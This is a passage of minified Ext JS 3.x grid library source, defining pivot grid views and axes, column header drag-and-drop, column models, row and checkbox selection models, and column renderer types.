a.gcell = new Ext.XTemplate('<td class="x-grid3-hd x-grid3-gcell x-grid3-td-{id} ux-grid-hd-group-row-{row} ' + this.colHeaderCellCls + '" style="{style}">', '<div {tooltip} class="x-grid3-hd-inner x-grid3-hd-{id}" unselectable="on" style="{istyle}">', this.grid.enableHdMenu ? '<a class="x-grid3-hd-btn" href="#"></a>' : "", "{value}", "</div>", "</td>")
}
this.templates = a;
this.hrowRe = new RegExp("ux-grid-hd-group-row-(\\d+)", "")
}, initElements:function () {
Ext.grid.PivotGridView.superclass.initElements.apply(this, arguments);
this.rowHeadersEl = new Ext.Element(this.scroller.child("div.x-grid3-row-headers"));
this.headerTitleEl = new Ext.Element(this.mainHd.child("div.x-grid3-header-title"))
}, getGridInnerWidth:function () {
var a = Ext.grid.PivotGridView.superclass.getGridInnerWidth.apply(this, arguments);
return a - this.getTotalRowHeaderWidth()
}, getTotalRowHeaderWidth:function () {
var d = this.getRowHeaders(), c = d.length, b = 0, a;
for (a = 0; a < c; a++) {
b += d[a].width
}
return b
}, getTotalColumnHeaderHeight:function () {
return this.getColumnHeaders().length * 21
}, getCellIndex:function (b) {
if (b) {
var a = b.className.match(this.colRe), c;
if (a && (c = a[1])) {
return parseInt(c.split("-")[1], 10)
}
}
return false
}, renderUI:function () {
var b = this.templates, a = this.getGridInnerWidth();
return b.master.apply({body:b.body.apply({rows:" "}), ostyle:"width:" + a + "px", bstyle:"width:" + a + "px"})
}, onLayout:function (b, a) {
Ext.grid.PivotGridView.superclass.onLayout.apply(this, arguments);
var b = this.getGridInnerWidth();
this.resizeColumnHeaders(b);
this.resizeAllRows(b)
}, refresh:function (b) {
this.fireEvent("beforerefresh", this);
this.grid.stopEditing(true);
var a = this.renderBody();
this.mainBody.update(a).setWidth(this.getGridInnerWidth());
if (b === true) {
this.updateHeaders();
this.updateHeaderSortState()
}
this.processRows(0, true);
this.layout();
this.applyEmptyText();
this.fireEvent("refresh", this)
}, renderHeaders:Ext.emptyFn, fitColumns:Ext.emptyFn, resizeColumnHeaders:function (b) {
var a = this.grid.topAxis;
if (a.rendered) {
a.el.setWidth(b)
}
}, resizeRowHeaders:function () {
var a = this.getTotalRowHeaderWidth(), b = String.format("margin-left: {0}px;", a);
this.rowHeadersEl.setWidth(a);
this.mainBody.applyStyles(b);
Ext.fly(this.innerHd).applyStyles(b);
this.headerTitleEl.setWidth(a);
this.headerTitleEl.setHeight(this.getTotalColumnHeaderHeight())
}, resizeAllRows:function (b) {
var d = this.getRows(), c = d.length, a;
for (a = 0; a < c; a++) {
Ext.fly(d[a]).setWidth(b);
Ext.fly(d[a]).child("table").setWidth(b)
}
}, updateHeaders:function () {
this.renderGroupRowHeaders();
this.renderGroupColumnHeaders()
}, renderGroupRowHeaders:function () {
var a = this.grid.leftAxis;
this.resizeRowHeaders();
a.rendered = false;
a.render(this.rowHeadersEl);
this.setTitle(this.title)
}, setTitle:function (a) {
this.headerTitleEl.child("span").dom.innerHTML = a
}, renderGroupColumnHeaders:function () {
var a = this.grid.topAxis;
a.rendered = false;
a.render(this.innerHd.firstChild)
}, isMenuDisabled:function (a, b) {
return true
}});
Ext.grid.PivotAxis = Ext.extend(Ext.Component, {orientation:"horizontal", defaultHeaderWidth:80, paddingWidth:7, setDimensions:function (a) {
this.dimensions = a
}, onRender:function (b, a) {
var c = this.orientation == "horizontal" ? this.renderHorizontalRows() : this.renderVerticalRows();
this.el = Ext.DomHelper.overwrite(b.dom, {tag:"table", cn:c}, true)
}, renderHorizontalRows:function () {
var k = this.buildHeaders(), a = k.length, g = [], c, h, e, d, b;
for (d = 0; d < a; d++) {
c = [];
h = k[d].items;
e = h.length;
for (b = 0; b < e; b++) {
c.push({tag:"td", html:h[b].header, colspan:h[b].span})
}
g[d] = {tag:"tr", cn:c}
}
return g
}, renderVerticalRows:function () {
var b = this.buildHeaders(), k = b.length, a = [], m = [], h, c, l, g, e, d;
for (e = 0; e < k; e++) {
c = b[e];
g = c.width || 80;
h = c.items.length;
for (d = 0; d < h; d++) {
l = c.items[d];
a[l.start] = a[l.start] || [];
a[l.start].push({tag:"td", html:l.header, rowspan:l.span, width:Ext.isBorderBox ? g : g - this.paddingWidth})
}
}
h = a.length;
for (e = 0; e < h; e++) {
m[e] = {tag:"tr", cn:a[e]}
}
return m
}, getTuples:function () {
var b = new Ext.data.Store({});
b.data = this.store.data.clone();
b.fields = this.store.fields;
var l = [], a = this.dimensions, c = a.length, j;
for (j = 0; j < c; j++) {
l.push({field:a[j].dataIndex, direction:a[j].direction || "ASC"})
}
b.sort(l);
var e = b.data.items, n = [], k = [], o, h, d, g, m;
c = e.length;
for (j = 0; j < c; j++) {
d = this.getRecordInfo(e[j]);
g = d.data;
h = "";
for (m in g) {
h += g[m] + "---"
}
if (n.indexOf(h) == -1) {
n.push(h);
k.push(d)
}
}
b.destroy();
return k
}, getRecordInfo:function (a) {
var e = this.dimensions, d = e.length, h = {}, j, c, b;
for (b = 0; b < d; b++) {
j = e[b];
c = j.dataIndex;
h[c] = a.get(c)
}
var g = function (i) {
return function (k) {
for (var l in i) {
if (k.get(l) != i[l]) {
return false
}
}
return true
}
};
return{data:h, matcher:g(h)}
}, buildHeaders:function () {
var l = this.getTuples(), m = l.length, a = this.dimensions, e, r = a.length, c = [], o, s, n, q, p, b, k, h, g, d;
for (g = 0; g < r; g++) {
e = a[g];
s = [];
p = 0;
b = 0;
for (d = 0; d < m; d++) {
o = l[d];
k = d == (m - 1);
n = o.data[e.dataIndex];
h = q != undefined && q != n;
if (g > 0 && d > 0) {
h = h || o.data[a[g - 1].dataIndex] != l[d - 1].data[a[g - 1].dataIndex]
}
if (h) {
s.push({header:q, span:p, start:b});
b += p;
p = 0
}
if (k) {
s.push({header:n, span:p + 1, start:b});
b += p;
p = 0
}
q = n;
p++
}
c.push({items:s, width:e.width || this.defaultHeaderWidth});
q = undefined
}
return c
}});
Ext.grid.HeaderDragZone = Ext.extend(Ext.dd.DragZone, {maxDragWidth:120, constructor:function (a, c, b) {
this.grid = a;
this.view = a.getView();
this.ddGroup = "gridHeader" + this.grid.getGridEl().id;
Ext.grid.HeaderDragZone.superclass.constructor.call(this, c);
if (b) {
this.setHandleElId(Ext.id(c));
this.setOuterHandleElId(Ext.id(b))
}
this.scroll = false
}, getDragData:function (c) {
var a = Ext.lib.Event.getTarget(c), b = this.view.findHeaderCell(a);
if (b) {
return{ddel:b.firstChild, header:b}
}
return false
}, onInitDrag:function (a) {
this.dragHeadersDisabled = this.view.headersDisabled;
this.view.headersDisabled = true;
var b = this.dragData.ddel.cloneNode(true);
b.id = Ext.id();
b.style.width = Math.min(this.dragData.header.offsetWidth, this.maxDragWidth) + "px";
this.proxy.update(b);
return true
}, afterValidDrop:function () {
this.completeDrop()
}, afterInvalidDrop:function () {
this.completeDrop()
}, completeDrop:function () {
var a = this.view, b = this.dragHeadersDisabled;
setTimeout(function () {
a.headersDisabled = b
}, 50)
}});
Ext.grid.HeaderDropZone = Ext.extend(Ext.dd.DropZone, {proxyOffsets:[-4, -9], fly:Ext.Element.fly, constructor:function (a, c, b) {
this.grid = a;
this.view = a.getView();
this.proxyTop = Ext.DomHelper.append(document.body, {cls:"col-move-top", html:" "}, true);
this.proxyBottom = Ext.DomHelper.append(document.body, {cls:"col-move-bottom", html:" "}, true);
this.proxyTop.hide = this.proxyBottom.hide = function () {
this.setLeftTop(-100, -100);
this.setStyle("visibility", "hidden")
};
this.ddGroup = "gridHeader" + this.grid.getGridEl().id;
Ext.grid.HeaderDropZone.superclass.constructor.call(this, a.getGridEl().dom)
}, getTargetFromEvent:function (c) {
var a = Ext.lib.Event.getTarget(c), b = this.view.findCellIndex(a);
if (b !== false) {
return this.view.getHeaderCell(b)
}
}, nextVisible:function (c) {
var b = this.view, a = this.grid.colModel;
c = c.nextSibling;
while (c) {
if (!a.isHidden(b.getCellIndex(c))) {
return c
}
c = c.nextSibling
}
return null
}, prevVisible:function (c) {
var b = this.view, a = this.grid.colModel;
c = c.prevSibling;
while (c) {
if (!a.isHidden(b.getCellIndex(c))) {
return c
}
c = c.prevSibling
}
return null
}, positionIndicator:function (d, k, j) {
var a = Ext.lib.Event.getPageX(j), g = Ext.lib.Dom.getRegion(k.firstChild), c, i, b = g.top + this.proxyOffsets[1];
if ((g.right - a) <= (g.right - g.left) / 2) {
c = g.right + this.view.borderWidth;
i = "after"
} else {
c = g.left;
i = "before"
}
if (this.grid.colModel.isFixed(this.view.getCellIndex(k))) {
return false
}
c += this.proxyOffsets[0];
this.proxyTop.setLeftTop(c, b);
this.proxyTop.show();
if (!this.bottomOffset) {
this.bottomOffset = this.view.mainHd.getHeight()
}
this.proxyBottom.setLeftTop(c, b + this.proxyTop.dom.offsetHeight + this.bottomOffset);
this.proxyBottom.show();
return i
}, onNodeEnter:function (d, a, c, b) {
if (b.header != d) {
this.positionIndicator(b.header, d, c)
}
}, onNodeOver:function (g, b, d, c) {
var a = false;
if (c.header != g) {
a = this.positionIndicator(c.header, g, d)
}
if (!a) {
this.proxyTop.hide();
this.proxyBottom.hide()
}
return a ? this.dropAllowed : this.dropNotAllowed
}, onNodeOut:function (d, a, c, b) {
this.proxyTop.hide();
this.proxyBottom.hide()
}, onNodeDrop:function (b, m, g, c) {
var d = c.header;
if (d != b) {
var k = this.grid.colModel, j = Ext.lib.Event.getPageX(g), a = Ext.lib.Dom.getRegion(b.firstChild), o = (a.right - j) <= ((a.right - a.left) / 2) ? "after" : "before", i = this.view.getCellIndex(d), l = this.view.getCellIndex(b);
if (o == "after") {
l++
}
if (i < l) {
l--
}
k.moveColumn(i, l);
return true
}
return false
}});
Ext.grid.GridView.ColumnDragZone = Ext.extend(Ext.grid.HeaderDragZone, {constructor:function (a, b) {
Ext.grid.GridView.ColumnDragZone.superclass.constructor.call(this, a, b, null);
this.proxy.el.addClass("x-grid3-col-dd")
}, handleMouseDown:function (a) {
}, callHandleMouseDown:function (a) {
Ext.grid.GridView.ColumnDragZone.superclass.handleMouseDown.call(this, a)
}});
Ext.grid.SplitDragZone = Ext.extend(Ext.dd.DDProxy, {fly:Ext.Element.fly, constructor:function (a, c, b) {
this.grid = a;
this.view = a.getView();
this.proxy = this.view.resizeProxy;
Ext.grid.SplitDragZone.superclass.constructor.call(this, c, "gridSplitters" + this.grid.getGridEl().id, {dragElId:Ext.id(this.proxy.dom), resizeFrame:false});
this.setHandleElId(Ext.id(c));
this.setOuterHandleElId(Ext.id(b));
this.scroll = false
}, b4StartDrag:function (a, d) {
this.view.headersDisabled = true;
this.proxy.setHeight(this.view.mainWrap.getHeight());
var b = this.cm.getColumnWidth(this.cellIndex);
var c = Math.max(b - this.grid.minColumnWidth, 0);
this.resetConstraints();
this.setXConstraint(c, 1000);
this.setYConstraint(0, 0);
this.minX = a - c;
this.maxX = a + 1000;
this.startPos = a;
Ext.dd.DDProxy.prototype.b4StartDrag.call(this, a, d)
}, handleMouseDown:function (c) {
var b = Ext.EventObject.setEvent(c);
var a = this.fly(b.getTarget());
if (a.hasClass("x-grid-split")) {
this.cellIndex = this.view.getCellIndex(a.dom);
this.split = a.dom;
this.cm = this.grid.colModel;
if (this.cm.isResizable(this.cellIndex) && !this.cm.isFixed(this.cellIndex)) {
Ext.grid.SplitDragZone.superclass.handleMouseDown.apply(this, arguments)
}
}
}, endDrag:function (c) {
this.view.headersDisabled = false;
var a = Math.max(this.minX, Ext.lib.Event.getPageX(c));
var b = a - this.startPos;
this.view.onColumnSplitterMoved(this.cellIndex, this.cm.getColumnWidth(this.cellIndex) + b)
}, autoOffset:function () {
this.setDelta(0, 0)
}});
Ext.grid.GridDragZone = function (b, a) {
this.view = b.getView();
Ext.grid.GridDragZone.superclass.constructor.call(this, this.view.mainBody.dom, a);
this.scroll = false;
this.grid = b;
this.ddel = document.createElement("div");
this.ddel.className = "x-grid-dd-wrap"
};
Ext.extend(Ext.grid.GridDragZone, Ext.dd.DragZone, {ddGroup:"GridDD", getDragData:function (b) {
var a = Ext.lib.Event.getTarget(b);
var d = this.view.findRowIndex(a);
if (d !== false) {
var c = this.grid.selModel;
if (!c.isSelected(d) || b.hasModifier()) {
c.handleMouseDown(this.grid, d, b)
}
return{grid:this.grid, ddel:this.ddel, rowIndex:d, selections:c.getSelections()}
}
return false
}, onInitDrag:function (b) {
var a = this.dragData;
this.ddel.innerHTML = this.grid.getDragDropText();
this.proxy.update(this.ddel)
}, afterRepair:function () {
this.dragging = false
}, getRepairXY:function (b, a) {
return false
}, onEndDrag:function (a, b) {
}, onValidDrop:function (a, b, c) {
this.hideProxy()
}, beforeInvalidDrop:function (a, b) {
}});
Ext.grid.ColumnModel = Ext.extend(Ext.util.Observable, {defaultWidth:100, defaultSortable:false, constructor:function (a) {
if (a.columns) {
Ext.apply(this, a);
this.setConfig(a.columns, true)
} else {
this.setConfig(a, true)
}
this.addEvents("widthchange", "headerchange", "hiddenchange", "columnmoved", "configchange");
Ext.grid.ColumnModel.superclass.constructor.call(this)
}, getColumnId:function (a) {
return this.config[a].id
}, getColumnAt:function (a) {
return this.config[a]
}, setConfig:function (d, b) {
var e, h, a;
if (!b) {
delete this.totalWidth;
for (e = 0, a = this.config.length; e < a; e++) {
h = this.config[e];
if (h.setEditor) {
h.setEditor(null)
}
}
}
this.defaults = Ext.apply({width:this.defaultWidth, sortable:this.defaultSortable}, this.defaults);
this.config = d;
this.lookup = {};
for (e = 0, a = d.length; e < a; e++) {
h = Ext.applyIf(d[e], this.defaults);
if (Ext.isEmpty(h.id)) {
h.id = e
}
if (!h.isColumn) {
var g = Ext.grid.Column.types[h.xtype || "gridcolumn"];
h = new g(h);
d[e] = h
}
this.lookup[h.id] = h
}
if (!b) {
this.fireEvent("configchange", this)
}
}, getColumnById:function (a) {
return this.lookup[a]
}, getIndexById:function (c) {
for (var b = 0, a = this.config.length; b < a; b++) {
if (this.config[b].id == c) {
return b
}
}
return -1
}, moveColumn:function (e, b) {
var a = this.config, d = a[e];
a.splice(e, 1);
a.splice(b, 0, d);
this.dataMap = null;
this.fireEvent("columnmoved", this, e, b)
}, getColumnCount:function (b) {
var d = this.config.length, e = 0, a;
if (b === true) {
for (a = 0; a < d; a++) {
if (!this.isHidden(a)) {
e++
}
}
return e
}
return d
}, getColumnsBy:function (g, e) {
var b = this.config, h = b.length, a = [], d, j;
for (d = 0; d < h; d++) {
j = b[d];
if (g.call(e || this, j, d) === true) {
a[a.length] = j
}
}
return a
}, isSortable:function (a) {
return !!this.config[a].sortable
}, isMenuDisabled:function (a) {
return !!this.config[a].menuDisabled
}, getRenderer:function (a) {
return this.config[a].renderer || Ext.grid.ColumnModel.defaultRenderer
}, getRendererScope:function (a) {
return this.config[a].scope
}, setRenderer:function (a, b) {
this.config[a].renderer = b
}, getColumnWidth:function (a) {
var b = this.config[a].width;
if (typeof b != "number") {
b = this.defaultWidth
}
return b
}, setColumnWidth:function (b, c, a) {
this.config[b].width = c;
this.totalWidth = null;
if (!a) {
this.fireEvent("widthchange", this, b, c)
}
}, getTotalWidth:function (b) {
if (!this.totalWidth) {
this.totalWidth = 0;
for (var c = 0, a = this.config.length; c < a; c++) {
if (b || !this.isHidden(c)) {
this.totalWidth += this.getColumnWidth(c)
}
}
}
return this.totalWidth
}, getColumnHeader:function (a) {
return this.config[a].header
}, setColumnHeader:function (a, b) {
this.config[a].header = b;
this.fireEvent("headerchange", this, a, b)
}, getColumnTooltip:function (a) {
return this.config[a].tooltip
}, setColumnTooltip:function (a, b) {
this.config[a].tooltip = b
}, getDataIndex:function (a) {
return this.config[a].dataIndex
}, setDataIndex:function (a, b) {
this.config[a].dataIndex = b
}, findColumnIndex:function (d) {
var e = this.config;
for (var b = 0, a = e.length; b < a; b++) {
if (e[b].dataIndex == d) {
return b
}
}
return -1
}, isCellEditable:function (b, e) {
var d = this.config[b], a = d.editable;
return !!(a || (!Ext.isDefined(a) && d.editor))
}, getCellEditor:function (a, b) {
return this.config[a].getCellEditor(b)
}, setEditable:function (a, b) {
this.config[a].editable = b
}, isHidden:function (a) {
return !!this.config[a].hidden
}, isFixed:function (a) {
return !!this.config[a].fixed
}, isResizable:function (a) {
return a >= 0 && this.config[a].resizable !== false && this.config[a].fixed !== true
}, setHidden:function (a, b) {
var d = this.config[a];
if (d.hidden !== b) {
d.hidden = b;
this.totalWidth = null;
this.fireEvent("hiddenchange", this, a, b)
}
}, setEditor:function (a, b) {
this.config[a].setEditor(b)
}, destroy:function () {
var b = this.config.length, a = 0;
for (; a < b; a++) {
this.config[a].destroy()
}
delete this.config;
delete this.lookup;
this.purgeListeners()
}, setState:function (a, b) {
b = Ext.applyIf(b, this.defaults);
Ext.apply(this.config[a], b)
}});
Ext.grid.ColumnModel.defaultRenderer = function (a) {
if (typeof a == "string" && a.length < 1) {
return" "
}
return a
};
Ext.grid.AbstractSelectionModel = Ext.extend(Ext.util.Observable, {constructor:function () {
this.locked = false;
Ext.grid.AbstractSelectionModel.superclass.constructor.call(this)
}, init:function (a) {
this.grid = a;
if (this.lockOnInit) {
delete this.lockOnInit;
this.locked = false;
this.lock()
}
this.initEvents()
}, lock:function () {
if (!this.locked) {
this.locked = true;
var a = this.grid;
if (a) {
a.getView().on({scope:this, beforerefresh:this.sortUnLock, refresh:this.sortLock})
} else {
this.lockOnInit = true
}
}
}, sortLock:function () {
this.locked = true
}, sortUnLock:function () {
this.locked = false
}, unlock:function () {
if (this.locked) {
this.locked = false;
var a = this.grid, b;
if (a) {
b = a.getView();
b.un("beforerefresh", this.sortUnLock, this);
b.un("refresh", this.sortLock, this)
} else {
delete this.lockOnInit
}
}
}, isLocked:function () {
return this.locked
}, destroy:function () {
this.unlock();
this.purgeListeners()
}});
Ext.grid.RowSelectionModel = Ext.extend(Ext.grid.AbstractSelectionModel, {singleSelect:false, constructor:function (a) {
Ext.apply(this, a);
this.selections = new Ext.util.MixedCollection(false, function (b) {
return b.id
});
this.last = false;
this.lastActive = false;
this.addEvents("selectionchange", "beforerowselect", "rowselect", "rowdeselect");
Ext.grid.RowSelectionModel.superclass.constructor.call(this)
}, initEvents:function () {
if (!this.grid.enableDragDrop && !this.grid.enableDrag) {
this.grid.on("rowmousedown", this.handleMouseDown, this)
}
this.rowNav = new Ext.KeyNav(this.grid.getGridEl(), {up:this.onKeyPress, down:this.onKeyPress, scope:this});
this.grid.getView().on({scope:this, refresh:this.onRefresh, rowupdated:this.onRowUpdated, rowremoved:this.onRemove})
}, onKeyPress:function (g, b) {
var a = b == "up", h = a ? "selectPrevious" : "selectNext", d = a ? -1 : 1, c;
if (!g.shiftKey || this.singleSelect) {
this[h](false)
} else {
if (this.last !== false && this.lastActive !== false) {
c = this.last;
this.selectRange(this.last, this.lastActive + d);
this.grid.getView().focusRow(this.lastActive);
if (c !== false) {
this.last = c
}
} else {
this.selectFirstRow()
}
}
}, onRefresh:function () {
var g = this.grid.store, d = this.getSelections(), c = 0, a = d.length, b, e;
this.silent = true;
this.clearSelections(true);
for (; c < a; c++) {
e = d[c];
if ((b = g.indexOfId(e.id)) != -1) {
this.selectRow(b, true)
}
}
if (d.length != this.selections.getCount()) {
this.fireEvent("selectionchange", this)
}
this.silent = false
}, onRemove:function (a, b, c) {
if (this.selections.remove(c) !== false) {
this.fireEvent("selectionchange", this)
}
}, onRowUpdated:function (a, b, c) {
if (this.isSelected(c)) {
a.onRowSelect(b)
}
}, selectRecords:function (b, e) {
if (!e) {
this.clearSelections()
}
var d = this.grid.store, c = 0, a = b.length;
for (; c < a; c++) {
this.selectRow(d.indexOf(b[c]), true)
}
}, getCount:function () {
return this.selections.length
}, selectFirstRow:function () {
this.selectRow(0)
}, selectLastRow:function (a) {
this.selectRow(this.grid.store.getCount() - 1, a)
}, selectNext:function (a) {
if (this.hasNext()) {
this.selectRow(this.last + 1, a);
this.grid.getView().focusRow(this.last);
return true
}
return false
}, selectPrevious:function (a) {
if (this.hasPrevious()) {
this.selectRow(this.last - 1, a);
this.grid.getView().focusRow(this.last);
return true
}
return false
}, hasNext:function () {
return this.last !== false && (this.last + 1) < this.grid.store.getCount()
}, hasPrevious:function () {
return !!this.last
}, getSelections:function () {
return[].concat(this.selections.items)
}, getSelected:function () {
return this.selections.itemAt(0)
}, each:function (e, d) {
var c = this.getSelections(), b = 0, a = c.length;
for (; b < a; b++) {
if (e.call(d || this, c[b], b) === false) {
return false
}
}
return true
}, clearSelections:function (a) {
if (this.isLocked()) {
return
}
if (a !== true) {
var c = this.grid.store, b = this.selections;
b.each(function (d) {
this.deselectRow(c.indexOfId(d.id))
}, this);
b.clear()
} else {
this.selections.clear()
}
this.last = false
}, selectAll:function () {
if (this.isLocked()) {
return
}
this.selections.clear();
for (var b = 0, a = this.grid.store.getCount(); b < a; b++) {
this.selectRow(b, true)
}
}, hasSelection:function () {
return this.selections.length > 0
}, isSelected:function (a) {
var b = Ext.isNumber(a) ? this.grid.store.getAt(a) : a;
return(b && this.selections.key(b.id) ? true : false)
}, isIdSelected:function (a) {
return(this.selections.key(a) ? true : false)
}, handleMouseDown:function (d, i, h) {
if (h.button !== 0 || this.isLocked()) {
return
}
var a = this.grid.getView();
if (h.shiftKey && !this.singleSelect && this.last !== false) {
var c = this.last;
this.selectRange(c, i, h.ctrlKey);
this.last = c;
a.focusRow(i)
} else {
var b = this.isSelected(i);
if (h.ctrlKey && b) {
this.deselectRow(i)
} else {
if (!b || this.getCount() > 1) {
this.selectRow(i, h.ctrlKey || h.shiftKey);
a.focusRow(i)
}
}
}
}, selectRows:function (c, d) {
if (!d) {
this.clearSelections()
}
for (var b = 0, a = c.length; b < a; b++) {
this.selectRow(c[b], true)
}
}, selectRange:function (b, a, d) {
var c;
if (this.isLocked()) {
return
}
if (!d) {
this.clearSelections()
}
if (b <= a) {
for (c = b; c <= a; c++) {
this.selectRow(c, true)
}
} else {
for (c = b; c >= a; c--) {
this.selectRow(c, true)
}
}
}, deselectRange:function (c, b, a) {
if (this.isLocked()) {
return
}
for (var d = c; d <= b; d++) {
this.deselectRow(d, a)
}
}, selectRow:function (b, d, a) {
if (this.isLocked() || (b < 0 || b >= this.grid.store.getCount()) || (d && this.isSelected(b))) {
return
}
var c = this.grid.store.getAt(b);
if (c && this.fireEvent("beforerowselect", this, b, d, c) !== false) {
if (!d || this.singleSelect) {
this.clearSelections()
}
this.selections.add(c);
this.last = this.lastActive = b;
if (!a) {
this.grid.getView().onRowSelect(b)
}
if (!this.silent) {
this.fireEvent("rowselect", this, b, c);
this.fireEvent("selectionchange", this)
}
}
}, deselectRow:function (b, a) {
if (this.isLocked()) {
return
}
if (this.last == b) {
this.last = false
}
if (this.lastActive == b) {
this.lastActive = false
}
var c = this.grid.store.getAt(b);
if (c) {
this.selections.remove(c);
if (!a) {
this.grid.getView().onRowDeselect(b)
}
this.fireEvent("rowdeselect", this, b, c);
this.fireEvent("selectionchange", this)
}
}, acceptsNav:function (c, b, a) {
return !a.isHidden(b) && a.isCellEditable(b, c)
}, onEditorKey:function (n, l) {
var d = l.getKey(), h, i = this.grid, p = i.lastEdit, j = i.activeEditor, b = l.shiftKey, o, p, a, m;
if (d == l.TAB) {
l.stopEvent();
j.completeEdit();
if (b) {
h = i.walkCells(j.row, j.col - 1, -1, this.acceptsNav, this)
} else {
h = i.walkCells(j.row, j.col + 1, 1, this.acceptsNav, this)
}
} else {
if (d == l.ENTER) {
if (this.moveEditorOnEnter !== false) {
if (b) {
h = i.walkCells(p.row - 1, p.col, -1, this.acceptsNav, this)
} else {
h = i.walkCells(p.row + 1, p.col, 1, this.acceptsNav, this)
}
}
}
}
if (h) {
a = h[0];
m = h[1];
this.onEditorSelect(a, p.row);
if (i.isEditor && i.editing) {
o = i.activeEditor;
if (o && o.field.triggerBlur) {
o.field.triggerBlur()
}
}
i.startEditing(a, m)
}
}, onEditorSelect:function (b, a) {
if (a != b) {
this.selectRow(b)
}
}, destroy:function () {
Ext.destroy(this.rowNav);
this.rowNav = null;
Ext.grid.RowSelectionModel.superclass.destroy.call(this)
}});
Ext.grid.Column = Ext.extend(Ext.util.Observable, {isColumn:true, constructor:function (b) {
Ext.apply(this, b);
if (Ext.isString(this.renderer)) {
this.renderer = Ext.util.Format[this.renderer]
} else {
if (Ext.isObject(this.renderer)) {
this.scope = this.renderer.scope;
this.renderer = this.renderer.fn
}
}
if (!this.scope) {
this.scope = this
}
var a = this.editor;
delete this.editor;
this.setEditor(a);
this.addEvents("click", "contextmenu", "dblclick", "mousedown");
Ext.grid.Column.superclass.constructor.call(this)
}, processEvent:function (b, d, c, g, a) {
return this.fireEvent(b, this, c, g, d)
}, destroy:function () {
if (this.setEditor) {
this.setEditor(null)
}
this.purgeListeners()
}, renderer:function (a) {
return a
}, getEditor:function (a) {
return this.editable !== false ? this.editor : null
}, setEditor:function (b) {
var a = this.editor;
if (a) {
if (a.gridEditor) {
a.gridEditor.destroy();
delete a.gridEditor
} else {
a.destroy()
}
}
this.editor = null;
if (b) {
if (!b.isXType) {
b = Ext.create(b, "textfield")
}
this.editor = b
}
}, getCellEditor:function (b) {
var a = this.getEditor(b);
if (a) {
if (!a.startEdit) {
if (!a.gridEditor) {
a.gridEditor = new Ext.grid.GridEditor(a)
}
a = a.gridEditor
}
}
return a
}});
Ext.grid.BooleanColumn = Ext.extend(Ext.grid.Column, {trueText:"true", falseText:"false", undefinedText:" ", constructor:function (a) {
Ext.grid.BooleanColumn.superclass.constructor.call(this, a);
var c = this.trueText, d = this.falseText, b = this.undefinedText;
this.renderer = function (e) {
if (e === undefined) {
return b
}
if (!e || e === "false") {
return d
}
return c
}
}});
Ext.grid.NumberColumn = Ext.extend(Ext.grid.Column, {format:"0,000.00", constructor:function (a) {
Ext.grid.NumberColumn.superclass.constructor.call(this, a);
this.renderer = Ext.util.Format.numberRenderer(this.format)
}});
Ext.grid.DateColumn = Ext.extend(Ext.grid.Column, {format:"m/d/Y", constructor:function (a) {
Ext.grid.DateColumn.superclass.constructor.call(this, a);
this.renderer = Ext.util.Format.dateRenderer(this.format)
}});
Ext.grid.TemplateColumn = Ext.extend(Ext.grid.Column, {constructor:function (a) {
Ext.grid.TemplateColumn.superclass.constructor.call(this, a);
var b = (!Ext.isPrimitive(this.tpl) && this.tpl.compile) ? this.tpl : new Ext.XTemplate(this.tpl);
this.renderer = function (d, e, c) {
return b.apply(c.data)
};
this.tpl = b
}});
Ext.grid.ActionColumn = Ext.extend(Ext.grid.Column, {header:" ", actionIdRe:/x-action-col-(\d+)/, altText:"", constructor:function (b) {
var g = this, c = b.items || (g.items = [g]), a = c.length, d, e;
Ext.grid.ActionColumn.superclass.constructor.call(g, b);
g.renderer = function (h, i) {
h = Ext.isFunction(b.renderer) ? b.renderer.apply(this, arguments) || "" : "";
i.css += " x-action-col-cell";
for (d = 0; d < a; d++) {
e = c[d];
h += '<img alt="' + (e.altText || g.altText) + '" src="' + (e.icon || Ext.BLANK_IMAGE_URL) + '" class="x-action-col-icon x-action-col-' + String(d) + " " + (e.iconCls || "") + " " + (Ext.isFunction(e.getClass) ? e.getClass.apply(e.scope || this.scope || this, arguments) : "") + '"' + ((e.tooltip) ? ' ext:qtip="' + e.tooltip + '"' : "") + " />"
}
return h
}
}, destroy:function () {
delete this.items;
delete this.renderer;
return Ext.grid.ActionColumn.superclass.destroy.apply(this, arguments)
}, processEvent:function (c, i, d, j, b) {
var a = i.getTarget().className.match(this.actionIdRe), h, g;
if (a && (h = this.items[parseInt(a[1], 10)])) {
if (c == "click") {
(g = h.handler || this.handler) && g.call(h.scope || this.scope || this, d, j, b, h, i)
} else {
if ((c == "mousedown") && (h.stopSelection !== false)) {
return false
}
}
}
return Ext.grid.ActionColumn.superclass.processEvent.apply(this, arguments)
}});
Ext.grid.Column.types = {gridcolumn:Ext.grid.Column, booleancolumn:Ext.grid.BooleanColumn, numbercolumn:Ext.grid.NumberColumn, datecolumn:Ext.grid.DateColumn, templatecolumn:Ext.grid.TemplateColumn, actioncolumn:Ext.grid.ActionColumn};
Ext.grid.RowNumberer = Ext.extend(Object, {header:"", width:23, sortable:false, constructor:function (a) {
Ext.apply(this, a);
if (this.rowspan) {
this.renderer = this.renderer.createDelegate(this)
}
}, fixed:true, hideable:false, menuDisabled:true, dataIndex:"", id:"numberer", rowspan:undefined, renderer:function (b, c, a, d) {
if (this.rowspan) {
c.cellAttr = 'rowspan="' + this.rowspan + '"'
}
return d + 1
}});
Ext.grid.CheckboxSelectionModel = Ext.extend(Ext.grid.RowSelectionModel, {header:'<div class="x-grid3-hd-checker"> </div>', width:20, sortable:false, menuDisabled:true, fixed:true, hideable:false, dataIndex:"", id:"checker", isColumn:true, constructor:function () {
Ext.grid.CheckboxSelectionModel.superclass.constructor.apply(this, arguments);
if (this.checkOnly) {
this.handleMouseDown = Ext.emptyFn
}
}, initEvents:function () {
Ext.grid.CheckboxSelectionModel.superclass.initEvents.call(this);
this.grid.on("render", function () {
Ext.fly(this.grid.getView().innerHd).on("mousedown", this.onHdMouseDown, this)
}, this)
}, processEvent:function (b, d, c, g, a) {
if (b == "mousedown") {
this.onMouseDown(d, d.getTarget());
return false
} else {
return Ext.grid.Column.prototype.processEvent.apply(this, arguments)
}
}, onMouseDown:function (c, b) {
if (c.button === 0 && b.className == "x-grid3-row-checker") {
c.stopEvent();
var d = c.getTarget(".x-grid3-row");
if (d) {
var a = d.rowIndex;
if (this.isSelected(a)) {
this.deselectRow(a)
} else {
this.selectRow(a, true);
this.grid.getView().focusRow(a)
}
}
}
}, onHdMouseDown:function (c, a) {
if (a.className == "x-grid3-hd-checker") {
c.stopEvent();
var b = Ext.fly(a.parentNode);
var d = b.hasClass("x-grid3-hd-checker-on");
if (d) {
b.removeClass("x-grid3-hd-checker-on");
this.clearSelections()
} else {
b.addClass("x-grid3-hd-checker-on");
